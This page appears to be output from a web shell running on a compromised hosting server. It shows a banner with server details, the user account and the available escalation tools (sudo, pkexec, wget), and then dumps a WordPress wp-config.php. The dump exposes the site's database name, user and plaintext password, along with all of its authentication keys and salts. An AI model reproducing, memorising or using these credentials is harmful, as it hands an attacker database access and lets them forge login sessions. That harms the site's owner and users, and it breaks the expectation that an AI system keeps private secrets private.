| Server IP : 45.162.171.154 / Your IP : 216.73.216.5 Web Server : Apache System : Linux vxct2015.avnam.net 5.4.106-1-pve #1 SMP PVE 5.4.106-1 (Fri, 19 Mar 2021 11:08:47 +0100) x86_64 User : lpg.com.ar ( 1041) PHP Version : 8.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/lpg.com.ar/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'lpg_com_ar');
/** MySQL database username */
define('DB_USER', 'lpg.com.ar');
/** MySQL database password */
define('DB_PASSWORD', 'Fede2952');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2IsB5vGOgVyJHqNVzVC9gYYEftEmj5Ne1DkodHHd7UnfFaxL8sFglH8VbkckqC3r');
define('SECURE_AUTH_KEY', 'odGPJp2plM7UUaZMvUBC5upTvLQlFTDDH50Qk3TtmnwhJZyInXOb00afjuni6kG8');
define('LOGGED_IN_KEY', 'F4dEQasx1YdxQ7TeZs2tueiHS8BoPdzbvJceS3i5hsvE1eJqYg7w6FenPQcoJDnT');
define('NONCE_KEY', 'HGmYuSZjuu4KsYCnteTklwSprhAg4osKpyBXzOGheovhoWaGwb0671kDrp4VDdYe');
define('AUTH_SALT', '9Mqp1OScT5KmcrdiHMTYrDrJ6GXrF1oWeZyGLi8sGxxZXdv6Soxx7qf9K35gkoRR');
define('SECURE_AUTH_SALT', 'lgrtxq1MuwuplYdSr2BHAk5Fzl6U2aG51WrAtq0a3Gri2253r45ABGPLSpnIfmwG');
define('LOGGED_IN_SALT', 'gnZTvpyR7Zi8wDnOj5CCbuBvCKx48TTbP6cQyhacNz6pglmTyD8Ft1DipTCBIVeX');
define('NONCE_SALT', 'W6xeA8HyVLL3tiKTR06pM9I9G8ZYWXfnxo6qiIwXJISz1mAgjTpHt6HUw8Jz9m0P');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';